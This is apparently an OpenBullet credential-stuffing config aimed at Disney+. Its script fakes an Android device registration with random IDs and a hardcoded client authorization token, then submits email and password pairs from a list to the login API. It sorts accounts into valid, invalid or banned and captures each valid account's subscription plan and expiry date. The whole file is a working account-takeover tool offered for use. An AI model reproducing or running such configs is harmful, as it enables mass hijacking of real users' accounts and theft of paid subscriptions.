[SETTINGS]
{
  "Name": "Disney+",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-06-28T15:00:36.9161222+03:00",
  "AdditionalInfo": "",
  "Author": " e a m",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Function FUNCTION RandomString "?h?h?h?d?h?h?d?d?l?d?h?h?h?h?h?h" -> VAR "random" 

#Function FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "random1" 

#Function FUNCTION GenerateGUID -> VAR "gui" 

#Post REQUEST POST "https://disney.api.edge.bamgrid.com/graph/v1/device/graphql" 
  CONTENT "{\"query\":\"\\\\n     mutation ($registerDevice: RegisterDeviceInput!) {\\\\n       registerDevice(registerDevice: $registerDevice) {\\\\n         __typename\\\\n       }\\\\n     }\\\\n     \",\"variables\":{\"registerDevice\":{\"applicationRuntime\":\"android\",\"attributes\":{\"osDeviceIds\":[{\"identifier\":\"<random>\",\"type\":\"android.vendor.id\"},{\"identifier\":\"<random1>\",\"type\":\"android.advertising.id\"}],\"manufacturer\":\"Samsung\",\"model\":\"A31\",\"operatingSystem\":\"Android\",\"operatingSystemVersion\":\"7.1.2\"},\"deviceFamily\":\"android\",\"deviceLanguage\":\"tr\",\"deviceProfile\":\"phone\"}}}" 
  CONTENTTYPE "application/json" 
  HEADER "Authorization: ZGlzbmV5JmFuZHJvaWQmMS4wLjA.bkeb0m230uUhv8qrAXuNu39tbE_mD5EEhM_NAcohjyA" 
  HEADER "X-BAMSDK-Transaction-ID: <gui>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" 

#Parse PARSE "<SOURCE>" JSON "accessToken" -> VAR "token" 

#POST REQUEST POST "https://disney.api.edge.bamgrid.com/v1/public/graphql" 
  CONTENT "{\"operationName\":\"login\",\"variables\":{\"input\":{\"email\":\"<USER>\",\"password\":\"<PASS>\"},\"includePaywall\":false,\"includeActionGrant\":false},\"query\":\"mutation login($input: LoginInput!, $includePaywall: Boolean!, $includeActionGrant: Boolean!) { login(login: $input) { __typename account { __typename ...accountGraphFragment } actionGrant @include(if: $includeActionGrant) activeSession { __typename ...sessionGraphFragment } paywall @include(if: $includePaywall) { __typename ...paywallGraphFragment } } } fragment accountGraphFragment on Account { __typename id activeProfile { __typename id } profiles { __typename ...profileGraphFragment } parentalControls { __typename isProfileCreationProtected } flows { __typename star { __typename isOnboarded } } attributes { __typename email emailVerified userVerified locations { __typename manual { __typename country } purchase { __typename country } registration { __typename geoIp { __typename country } } } } } fragment profileGraphFragment on Profile { __typename id name maturityRating { __typename ratingSystem ratingSystemValues contentMaturityRating maxRatingSystemValue isMaxContentMaturityRating } isAge21Verified flows { __typename star { __typename eligibleForOnboarding isOnboarded } } attributes { __typename isDefault kidsModeEnabled groupWatch { __typename enabled } languagePreferences { __typename appLanguage playbackLanguage preferAudioDescription preferSDH subtitleLanguage subtitlesEnabled } parentalControls { __typename isPinProtected kidProofExitEnabled liveAndUnratedContent { __typename enabled } } playbackSettings { __typename autoplay backgroundVideo prefer133 } avatar { __typename id userSelected } } } fragment sessionGraphFragment on Session { __typename sessionId device { __typename id } entitlements experiments { __typename featureId variantId version } homeLocation { __typename countryCode } inSupportedLocation isSubscriber location { __typename countryCode } portabilityLocation { __typename countryCode } preferredMaturityRating { __typename impliedMaturityRating ratingSystem } } fragment paywallGraphFragment on Paywall { __typename skus { __typename name sku entitlements } paywallHash context assertions { __typename documentCode } }\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Authorization: <token>" 
  HEADER "X-BAMSDK-Transaction-ID: <gui>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" 

#Keycheck KEYCHECK 
  KEYCHAIN Success OR 
    KEY "countryCode" 
  KEYCHAIN Failure OR 
    KEY "idp.error.identity.bad-credential" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" EqualTo "403" 

#Parse PARSE "<SOURCE>" JSON "accessToken" -> VAR "access" 

#Cap REQUEST GET "https://disney.api.edge.bamgrid.com/subscriptions" 
  
  HEADER "Accept: application/json" 
  HEADER "Authorization: <access>" 
  HEADER "X-BAMSDK-Transaction-ID: <gui>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" 
  HEADER "Host: disney.api.edge.bamgrid.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

#Parse PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "Paket" 

#Parse PARSE "<SOURCE>" LR "expirationDate\":\"" "T" CreateEmpty=FALSE -> CAP "Bitiş" 

#Function FUNCTION DateToUnixTime "yyyy-MM-dd" "<Bitiş>" -> VAR "Bitiş Tarihi" 

#Function FUNCTION CurrentUnixTime -> VAR "cek" 

IF "<SOURCE>" Contains "[]"
SET STATUS CUSTOM "FREE"
ENDIF
IF "<Bitiş Tarihi>" LessThan "<cek>"
SET STATUS CUSTOM "FREE"
ELSE
SET STATUS SUCCESS
ENDIF

